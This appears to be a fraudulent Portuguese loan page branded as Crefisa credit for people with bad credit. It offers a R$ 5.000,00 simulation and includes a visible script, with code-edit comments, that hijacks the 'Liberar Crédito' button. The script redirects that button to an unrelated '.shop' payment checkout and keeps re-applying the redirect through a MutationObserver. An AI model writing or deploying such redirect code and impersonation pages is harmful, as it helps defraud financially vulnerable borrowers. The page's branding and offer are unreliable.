Central de Atendimento: 0800 777 8021

Simule e Contrate seu Empréstimo

Arraste para escolher o valor e comece agora mesmo!

R$ 5.000,00
FAÇA SUA SIMULAÇÃO

CREFISA CRÉDITO PARA NEGATIVADO

// === Função utilitária para garantir o redirecionamento do botão de pagamento === function aplicarRedirectBotaoPagamento() { document.querySelectorAll('button').forEach(btn => { if (btn.textContent.trim() === 'Liberar Crédito') { btn.onclick = function() { window.location.href = 'https://checkout.pagamentoautenticado.shop/VCCL1O8SC3ML'; }; } }); } // ... existing code ... // No final do arquivo, adicione um MutationObserver global para garantir o redirecionamento mesmo com renderizações dinâmicas: (function() { const observer = new MutationObserver(() => { aplicarRedirectBotaoPagamento(); }); observer.observe(document.body, { childList: true, subtree: true }); // Chamada inicial aplicarRedirectBotaoPagamento(); })(); // ... existing code ...